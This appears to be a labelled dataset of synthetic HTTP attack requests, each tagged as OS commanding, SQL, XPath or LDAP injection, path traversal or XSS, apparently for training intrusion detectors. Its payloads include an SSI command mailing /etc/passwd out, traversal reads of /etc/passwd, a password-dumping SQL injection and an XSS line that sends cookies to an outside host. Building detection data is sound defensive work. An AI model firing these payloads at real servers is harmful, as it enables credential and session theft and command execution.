If-Range: Sun, 20 Nov 05 23:03:51 GMT
Max-Forwards: 7
MIME-Version: 1.0
Pragma: nspym='weGo'
Authorization: snkc Mgtgdo=olmd
Range: -2,-8149,5-8
Referer: /oeoda75t/ps4l/uoieye.pdf
TE: trailers,gzip
Trailer: Transfer-Encoding
User-Agent: <!-- #exec   cmd="/bin/mail   fAmeh1e.com     < /etc/passwd"-->
UA-OS: Windows NT
UA-Color: color16
Via: 1.8 245.121.48.148, ina4/4.7 81.218.155.73
Transfer-Encoding: deflate
Upgrade: ehegr/0.3
X-Forwarded-For: 14.26.239.125
X-Serial-Number: 16113564354084828876
----: ------------------------------------------

null

End - Id: 39877
Start - Id: 43300
class: OsCommanding
GET /lYvUB8UMZ7sT/eKl-LU/7pBm_CgLFmlJoevalq/rreqsiFEeiz8/q7nbiY/gDXsdPpwA6.BTre.js?a-FYjlw=zcmddj&OrN5huq52h=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fcat+++++%2Fetc%2Fpasswd++++%7C HTTP/1.1
Host: www.eba11ior.uk
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1254, x-mac-turkish;q=0.0, iso-8859-7
Accept-Encoding: gzip, gzip, identity;q=0.8, identity
Accept-Language: sFsia72a-eofe, aoDyad-plfwaTx;q=0.8, i-qtw;q=0.1
Cache-Control: e=aewh
Client-ip: 167.243.142.209
Cookie: rhoiirie=32707496;7asctu=149;frs5HLos=anfteo1st sh;zfhiExig5hgtia=processing-instruction6l;4aziib=Wb
Cookie2: $Version="26"
Date: Sat, 04 Feb 06 05:26:08 CET
ETag: W/"pGAcH-IoVLLI.qP.7"
Expect: 100-continue
From: 4obu@odhS32t2rn.ch
If-Modified-Since: Tue, 23 Mar 10 24:38:43 CET
If-Unmodified-Since: Thu, 18 Feb 10 04:58:46 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic cDlzYVNpc3Q6cEZOZnIx
Authorization: Digest response="e94e9e549009C6cefDEbd6920AD5aE3A"
Range: 534213-
Referer: http://www.aars.ch/rlhe6lf/i2aDoOa/e2ta5ti.mpg
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: iEmV1M.M http://www.hye7to.ch
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: evemx/1.6 142.180.216.74, HTTP/5.0 www.iv8air.gif, 1.2 www.hherTlg.htm
Transfer-Encoding: deflate
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43300
Start - Id: 43514
class: OsCommanding
GET /X8ZBAJ9g/aP7hBFf@uX.gif?sly8nt=%5Cnls++%2Froot%2F HTTP/1.1
Host: 105.233.9.163
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: macintosh;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="604"
Date: Sun, 07 Dec 08 11:50:30 CET
ETag: "PxnNJB_jtB5FqDUJ"
Expect: 100-continue
From: rb2eklg@erhan.net
If-Modified-Since: Wed, 02 Dec 09 22:05:56 UTC
If-Unmodified-Since: Fri, 09 Nov 07 01:27:22 UTC
If-Match: "@rMlvmqa0k1AbUsL"
If-None-Match: "cID5GLTs_skJKM_5"
If-Range: Mon, 10 Dec 07 23:18:19 CET
Max-Forwards: 4317
MIME-Version: 3.4
Pragma: lr=tiat
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bnhuYXNlZU41ZWJEZGN2TGxjdHB0b2tzNWNmU29zVGZvb2k5Q3M1N084ZQ==
Range: 41-,-475,4948-
Referer: http://eejicht.be/udHttact/dldj/set8a/gtu7.jsp
TE: trailers,trailers,chunked
Trailer: Accept-Encoding
User-Agent: hrotehz
UA-CPU: PowerPC
UA-Disp: 5670,938,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 8.8 109.16.146.121, 7.9 203.151.232.98, 0.0 www.n8ppd8gh.html
Transfer-Encoding: compress
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43514
Start - Id: 49401
class: XPathInjection
GET /scLU/lczso6nhIdtezjoa/pX-/gDscriptqHa/eoecaw/wMZ.mdb?repauYdsulex0=od%27pna7oor&8x775.q=38640&hesr=1roTg%27++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++++%27vUmaeac%27++%3D++++%27&eid=5278&wnnikeedhs3ntf=idopenabaithuie HTTP/1.1
Host: www.wreNisoro.fr:80
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.7, identity;q=0.4
Accept-Language: *;q=0.7
Cache-Control: eb='l9i'
Client-ip: 172.166.16.169
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="461"
Date: Wed, 03 Sep 08 10:31:13 GMT
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: pmtehnge
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sat, 20 Mar 04 24:13:04 CET
If-Unmodified-Since: Mon, 12 Nov 07 01:53:11 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 791
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM dWJzaGxuZXR5c3Nsbm5kdXJ6MHJkcjdhUmFkaGFqdGhpbnZobnNl
Authorization: eva0ie ht0wn=itiroFtg
Range: 708062-
Referer: /lt87aea0/eaostw/seneAagd/esttmes/aN9eldGh.doc
TE: trailers
Trailer: If-Range
User-Agent: iau4aEloeoussrtwdiv
UA-CPU: StrongARM
UA-Disp: 427,646,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.uejfxj6.png, 4.2 www.aptodf.gif, 8.4 www.tozmn.css
Transfer-Encoding: gzip
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 573 www.w0le3ue.js:98108 "oaMintne07soeaotcrtl" 
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 37054990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49401
Start - Id: 42180
class: SqlInjection
GET /h0iynrtupnta0rasoZap/Vg6wDm/IornH2oBnor/l2Lt0PMH/wR/dBjQhAgtQ/ktut9wOoyfmnhK/ze/cT/lsa48eaNBnbai65haint/Cyysvoia7ee.htm?Cibii8iaatxris=mmo4sohHlpsamc0es&h6rUsse=l3barxnk&lE4JTWUw=ftptb0fnenu&icge9p=%27++or++id+in++++%28++select+++++*++++from+++++++++user_db+++%29 HTTP/1.0
Host: www.ueu8smc.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1, iso-8859-1;q=0.9, koi8-r, x-mac-ce;q=0.6, iso-8859-2;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 171.126.113.10
Cookie: nYxgXoK=guL-jA;neE=89021;m3Achwmbrio=03663;sestt54ti=lrhsit)a1aDswE sa05r;clesbe=oa9shguci
Cookie2: $Version="85"
Date: Fri, 22 Jul 05 17:27:16 GMT
ETag: W/"NGLysbC8Lx4iZGnoq6"
Expect: 100-continue
From: ohNvytEy@xptAiar.st
If-Modified-Since: Sun, 22 May 05 22:08:11 UTC
If-Unmodified-Since: Thu, 05 May 05 17:06:57 GMT
If-Match: "boYIb4i8MsFnDmJd_V"
If-None-Match: "tjFvIU@i0xY0kLmb5TIW"
If-Range: Tue, 28 Jun 05 23:32:10 GMT
Max-Forwards: 049
MIME-Version: 5.3
Pragma: ULst=nh
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: tttnT asArsom=lnlse
Range: 1010-
Referer: /sdlA/5EoNeme/Etsana/eYxeth/do8tcgm.sh
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 8.9; ek-ha; rv:8.2.2) Gecko/05634351
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: amt/4.2, wwaier/5.7, iaqR/1.4
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42180
Start - Id: 46289
class: PathTransversal
GET /inenIrew/ON.htm?aIsilbb6uqht=rY-UZ&gwnTtrt=dc&HhuLSnQ=Oanmw&searoyGyhw=hyotrbin&n5lgTianvwdekeh=%2F%2C%2C%2C%2FG1RMf%2Fntadnr%2Fpasswd&drfwadEicaiRzdh=85760&7elaehO31ehcSa=%24Ligdpassthrul0hmae1ht&ceYIou=+reex&L7ctieaokunx=ofM2lbuQul&mRdWqJfRA=43223 HTTP/1.0
Host: 75.147.152.209:80
Connection: close
Accept: audio/*, application/zip, video/quicktime
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip, compress, identity;q=0.2
Accept-Language: luaulam-1;q=0.8, crj-ntt8bk9;q=0.7
Cache-Control: no-transform
Client-ip: 54.146.114.194
Cookie: dnw5s71H=&iframebineseRav]ANe2si;jegdeTiv=:i
Cookie2: $Version="38"
Date: Mon, 14 Mar 05 06:15:29 CET
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Sun, 28 Jun 09 01:45:42 UTC
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "dH1NbQc.n_I3mJu5."
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 5
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/ygess/rPo2ct/Manhrsn/oyiihes/ger1eh.exe
Authorization: Basic Ym8zRHhlTjp0VURo
Range: 5-,07-2
Referer: /bsesxmud/oolr0so/dptw/hewte/srSy.conf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 0.1; i5-eh; rv:9.0.4) Gecko/10589364
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.6 215.163.107.69, 9.1 www.m4abG.shtml, 4ozf/9.8 62.151.149.157
Transfer-Encoding: gzip
Upgrade: seEc/8.9, 7elors/6.3, 4uhv/9.8, I5eg5m/5.5
Warning: 966 120.240.162.4:31750 "00mbdoaEom" 
X-Forwarded-For: 177.74.168.130
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46289
Start - Id: 45176
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.at3l.org
Connection: ca3sR4
Accept: */*;q=0.8
Accept-Charset: x-mac-icelandic;q=0.1, x-mac-greek, windows-1257
Accept-Encoding: 
Accept-Language: iuo-FTem;q=0.7, cnjsuoa-o, nhszhcE-s;q=0.4, aoroeo-imsrbg5, m-jc0pot;q=0.6
Cache-Control: no-transform
Client-ip: 35.207.4.140
Cookie: npli=nahssam;6NwL.=frto;lgaaeeeS=vardRvo]psathcdemhome
Cookie2: $Version="339"
Date: Mon, 03 May 04 22:54:01 UTC
ETag: W/"Q9YT7f22enb@zJ0p.VT3"
Expect: neaaOnc=ioroca
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Mon, 30 Oct 06 19:14:13 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 0.7
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest nonce
Authorization: iiuOkn nehEam=apkt
Range: 551-3881,-846
Referer: /c6kows/cnIu/CsrtSb9N/iradn.rar
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: 6ssaet (aVsqi86s31; wVTxTCRCS)
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1177x8327
Via: 6.7 www.gdsQ8oo.png, 0.0 www.ka5eeize.html:4
Transfer-Encoding: identity
Upgrade: 09T/5.5
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45176
Start - Id: 41691
class: SqlInjection
GET /iutehdwati1I/sogra/GnEsi1l/twaop0dohfruitroes.tiff?latflyeq=tI9vKfGDIUe&4SPN6C=%27+++++OR++++%27aaAau7zi7O%27+++++%3D+++%270r%27%2B%27ti%27 HTTP/1.1
Host: www.bwltdantaD.cz
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, compress;q=0.0, deflate;q=0.0, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 173.78.32.144
Cookie: Pc8d_sQ.P3=llsl8ndhyiIc
Cookie2: $Version="7"
Date: Tue, 06 May 08 23:16:27 GMT
ETag: "rLGxCggwtE@E2OyW"
Expect: urn9xa
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sat, 01 Sep 07 11:30:45 CET
If-Unmodified-Since: Sun, 25 Apr 10 23:19:21 GMT
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: "y4v.EEsNtU62KTgcv-"
Max-Forwards: 4948
MIME-Version: 2.8
Pragma: epclvt=cenw
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: 271923-
Referer: /sdneo/vMHPn/g8bSh8.tiff
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 7.1; 9r-eh; rv:4.6.3) Gecko/69180997
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/7.0 www.meaeosto.jpg, hho/8.4 www.ssse.htm, FTP/9.8 www.p0iz3.png
Transfer-Encoding: ciwyit
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41691
Start - Id: 47140
class: XSS
GET /nLjapNEuWrZAV-J.ISi/5.m/tBognnssa7nout/eP2Qub4dBH-NAkj@Nf16/vtcetho3tn6vans9M/uitueahHsb/8ODMwhereYdocument-c78MdjZ.gif?otocwbea=2fnformo&nhdu=%3Cimg+dynsrc+%3D+++%22++javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.li.com%2Fcgi-bin%2Fnden.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E HTTP/1.0
Host: www.taxuwa.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-tw;q=0.0, euc-tw;q=0.6, gb2312, iso-8859-5;q=0.3
Accept-Encoding: identity
Accept-Language: ofoinefs-acmeacso, eeie-snA2;q=0.7, si-er;q=0.3
Cache-Control: only-if-cached
Client-ip: 127.106.132.180
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="5"
Date: Wed, 18 Mar 09 07:36:08 CET
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: 100-continue
From: SntgwR@dDthvRF0b.it
If-Modified-Since: Tue, 07 Dec 04 02:13:31 CET
If-Unmodified-Since: Mon, 27 Apr 09 04:33:52 GMT
If-Match: "1SNI7.GHyFvSP_@Ea"
If-None-Match: "UdGQgBJJXIMgwNCtTiI6"
If-Range: *
Max-Forwards: 79
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bnJ0MHUzNGkzYjVhaXZyYXdlY29sOXJvZGlvbnNhc290b3Jscw==
Range: -35233,639-
Referer: http://exI6fent.cz/efrgh1NN/atesa3/AcnCo.html
TE: trailers
Trailer: Via
User-Agent: UblT (9wz6lr5m8-; exessN03.; xgTLXH; s3jaXtXcvn)
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 673x645
Via: 5.5 201.223.246.78, 4.4 www.e0sar.css
Transfer-Encoding: identity
Upgrade: 8cCE/0.8, oso9/9.4, 3nw/2.9, zDsi/8.2, 6hhwb/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 710374983
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47140
Start - Id: 41566
class: SqlInjection
GET /e1f4yakE/jbbeaCnarnArnnhex/oLIBULECTBiPzv7/uGzTeRSjIzC18DRRw7X/etasq4zhbijgrio/4Zt/7A.swf?5ihadgsi=sAsitgeeslafs&xhrueu0cfndhay=i9mT&httna8rj3estso8=ewaba&echr6oslnyoqm=0JCw16&hrbGsmeyY9as=lXi8v.Tb&dcz9pfnn=%27%3B++++begin+++++declare+++++%40ret+varchar%288000%29+++set++++%40ret%3D%27%3A%27+++++select++%40ret%3D%40ret%2B%27+++%27%2BVytGcuN%2B%27%2F%27%2Bpassword++from++++rcroa++where+++++aaoon%3E%40ret++select+++%40ret++as++++ret+++into++++foo+++++end--&h9nn3afetSnsne=erOroemiostt&rtnrnmeleDb=hD5ll0aies&ii=rl&ssnamnnnn=imtfah+&eeHteist=tnvarq&oucr=adaNwJ&llrd=999 HTTP/1.0
Host: www.5e3asth.de
Connection: ltperw
Accept: */*
Accept-Charset: iso-8859-2;q=0.3
Accept-Encoding: 
Accept-Language: crnvtrb-rJRanh;q=0.3
Cache-Control: no-cache
Client-ip: 215.163.226.165
Cookie: ATinputE9vbscript@yphpZXI=uzBJcerepdu;WsjaanisseesIy=ucbt5;X6eams=eeinputadhagieen4;taRlihdmUxasyh=nullshHeform di7sN;tuloarxm=s7gtsnis&l8;ttOe=SxelpnhDss
Cookie2: $Version="102"
Date: Wed, 31 Mar 04 10:29:32 GMT
ETag: "z6VIV4-V9ClcxJYf"
Expect: oAcs=EcpeLe
From: usaacy07@scsi6.be
If-Modified-Since: Fri, 29 Oct 04 07:50:06 GMT
If-Unmodified-Since: Thu, 07 Jan 10 16:27:42 CET
If-Match: *
If-None-Match: "8WENARQdVZLlky.6w"
If-Range: *
Max-Forwards: 046
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM ZHRlYWxlb2NlemlhdHNZN3JhYW9hbXdsMGtvY2tyb2RhdTVudElEbXF0
Range: 629953-,-3
Referer: /mcuucg/cSTltm/etltIh6e/rnto.mpg
TE: trailers,gzip,chunked
Trailer: If-Range
User-Agent: eOsdhroyn/0.8.7.1
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/9.9 181.191.40.93, 9.3 243.126.203.94
Transfer-Encoding: tuEad; aeweT3es=A5neta
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41566
Start - Id: 47767
class: XSS
GET /aes.qD.X4W-9qZOjSX3/ossneifrkde/neidsrq0rj/ljq9_YnTQtJkxQ_FlhPh/tp7Nv/reRLy/tni7Rrwct6dceotEdo/6fromzmD8etc/ha3/siMT9aEnesl/5PzE.css?dhaut=%3Cdiv+++style++%3D+++%22++++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.de.com%2Fscript%2Ftdaosar.sh%5D%29%3B+%22++%3E&e8a=56502 HTTP/1.1
Host: www.da7atso9a.com:80
Connection: ihoirpal
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: l9hd-e;q=0.2, kkx-mta1, wloeeeeg-RHdt, n-b1daJ, efIeu-ylhn;q=0.3
Cache-Control: no-store
Client-ip: 226.81.74.174
Cookie: fitytSArve=tgiaat;nwaPianh=o;ntuoEbt=ruUrsu62sboteK;9Sh0J.copyxy=89091;t5CarrFah=tgo
Cookie2: $Version="49"
Date: Thu, 11 Jun 09 18:49:49 CET
ETag: "q@9vcjf95.j6GZXaYbP"
Expect: nDsefemd=atKvi;Sixr
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Thu, 03 Mar 05 17:48:33 CET
If-Match: "3VEZ_yjlOuFNp8f"
If-None-Match: *
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 935
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: asgu eNir55I=ndip
Range: 0-6,74113-
Referer: /8assEha/btjed3.asp
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: STutseAm0ahreeihe
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: FTP/3.2 www.lX9dqe.htm
Transfer-Encoding: gzip
Upgrade: Hooma/8.6, 5ec/4.1, Renu/5.6, 5nddy6/0.2, alr4/7.7
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47767
Start - Id: 43190
class: OsCommanding
GET /Hy/sl/3g4hCfuL-KzfieyG2/018v8fgtzc7.5Wg/iAPogr0ttehts/lLn88PW/tFXqlE9F17o3twoODFWM/0DWUUQ0QkB/erooosxreUtlelg3enb/las4ndmynmaqy/s5nhtaeEu82giqi7nna/2KLu-_1imNpTYpM-pSj.php4?Oqeseddteg=%2Fperl++%2Ftmp%2Fma.pl+-p7314&VSQfBpC=chssaet6&psWfZSQ9@A=9395037848&lTen4kep=18517558&reha8jwdnE=%27bP&ofns=%3FrI&hte=%5D&ta5ti6=sthTynti3sr+h3&hriMoqe=526&sTelc3=8866298857&g8663lS5dN=547192&fwwXq=5735143157 HTTP/1.1
Host: 246.118.126.24
Connection: keep-alive
Accept: audio/basic
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 174.221.219.110
Cookie: ev=2071855;DsLBG=426688;uk=50
Cookie2: $Version="045"
Date: Sat, 06 Aug 05 23:48:19 GMT
ETag: "gE.iO--EDoc3u98Y-ab"
Expect: 4attte
From: dsmHrei2@sentDlSn.biz
If-Modified-Since: Sat, 17 Jan 09 07:52:49 UTC
If-Unmodified-Since: Sat, 18 Oct 08 01:40:49 UTC
If-Match: *
If-None-Match: "SXd-ZzFmuLPOVweuIJ"
If-Range: Sun, 10 Jun 07 15:28:57 UTC
Max-Forwards: 7345
MIME-Version: 7.5
Pragma: dEubroim=tNapo
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Basic aWZvb2djdzpPcGd0a20=
Range: 3473-351,462906-
Referer: http://Esnrks.ch/cnsfp/mi4e.shtml
TE: trailers
Trailer: Authorization
User-Agent: l.jq5v http://www.tzle.de
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: HTTP/0.5 www.RstLt5.js, 2.1 8.169.14.152
Transfer-Encoding: compress
Upgrade: hi11/1.2
Warning: 944 www.beyry.html:93 "LTbae5" "Mon, 05 Mar 07 08:57:49 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43190
Start - Id: 37290
class: LdapInjection
POST /i4mR@4t8OsRHgLaoK._3/8ttr5oehTrE/kZ6DR42LlJytAr2hBJm/ki3SridiBtuttsd0e/iRY262KnsBSd/eiaeddvrsbltetss/SDwp-Nbeusr2lqf2.shtml? HTTP/1.0
Content-Length: 307
Content-Encoding: compress
Content-Location: http://llaenaR.fr/geusu/ae4afmnt/9leefRe.msf
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Apr 06 11:43:00 GMT
Last-Modified: Sat, 23 Jun 07 23:50:00 CET
Host: www.t4ec5as6hi.org
Connection: close
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, compress, identity;q=0.0, gzip, gzip;q=0.6
Cookie: esw=3903176;juo=3;reseemrmc6=drwn)(&(objectClass  = aw*);lo=458896301;o5tnhois=E)ti
If-Modified-Since: Fri, 26 Mar 10 20:36:54 GMT
If-Unmodified-Since: Thu, 14 Jun 07 17:00:49 GMT
If-Match: "4BsOjTRW7KPUojtRDr"
Authorization: Basic YnNzZ1RvZjk6ZWh3SXM=
Referer: http://5metriqe.cz/acodfo3e/tu9ruis.gif
User-Agent: dyhoatn/9.7.1.1
UA-OS: Windows 95
Warning: 504 www.ir4ljlee.js "3hjr" "Wed, 30 Jan 08 20:06:56 GMT"
----: ------------------------------------

dqh=sqz&telnetUHoISVD=wgeteaaamdeoi&cc7ooemt2aneui=6e3N&2khaaai3k=c2edtmp&rg=s5XeYe.kd.&2hatxehdoSnpath=3mZ865&8enrhn=0servicesmmroe~g&yPkkDF=ou+&dtSn3henaousIr=rZbmQ4&voy=group by'ixi6snlocatione|mDprocessing-instructionSlperl&itnlnt8=eeKry9._&aoalottsn1r7eu=dslit5Paimth&gDtSN3yOcJD=drfdrllnnJwosm

End - Id: 37290
Start - Id: 48985
class: XPathInjection
GET /lOw7-W4gti0vX1_z/sk1KEEtMnw/h353r7shrtubeih6/cia_eHBpB8nUP.CCjD/otLe5/nMrhXr.sETH8el/aoU2cLUL89x/HrmHT6/u8aeeigasetuteniIdoe/a60nreeo/elliAjuhlbechret/ajnitbontWstolMaygi.swf?lslkth=basa%27++++or+++++%28i++++%3C+count%28drsvt%2Fchild%3A%3Atext%28%29%29++++and++j++%3C++++count%28tcrie%2Fchild%3A%3Acomment%28%29%29+++++and++++k+++%3C+++count%28eet%2Fchild%3A%3A*%29++++%29++++or++%27eer%27+++%3D+++%27++4sug%27+++++or&s92peaioiHeu=sAahh&ecisl81=570 HTTP/1.0
Host: www.NtsAr.de
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: 7tuO-114;q=0.3, salanaeT-qrnt;q=0.5, eRndna-bcu8ir, cssfem5-ca4t4r3t;q=0.2
Cache-Control: no-cache
Client-ip: 102.111.118.138
Cookie: qvPCG=5NuGP;usrNDlGgKD=tlCF_SBw6mG;dsaourj=886;6t4Tooleatrih=21187796;ecam=std+;0oEf9a9wnQsH3ar=lee-
Cookie2: $Version="7"
Date: Sat, 09 Aug 08 03:03:08 UTC
ETag: "SIuC_mG3.D_K.LlO5Dn"
Expect: ovnum=suieMbtt
From: 6icshpO@RtgPShLon.org
If-Modified-Since: Fri, 06 Oct 06 10:55:08 GMT
If-Unmodified-Since: Tue, 20 Apr 04 06:18:14 CET
If-Match: "Ji1bZJJEocmtxGF9aP"
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: Fri, 12 Jun 09 02:15:26 UTC
Max-Forwards: 9365
MIME-Version: 7.4
Pragma: Qi='eitIu'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Basic b25vZW1jRTplc3Q4
Range: 23-,057-,45-
Referer: /sw3sr1/e9yd.txt
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: wUJuIXmV http://www.ya97.be
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8171x6640
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: compress
Upgrade: aivsar/6.5, Aensn/2.2
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48985
Start - Id: 43783
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
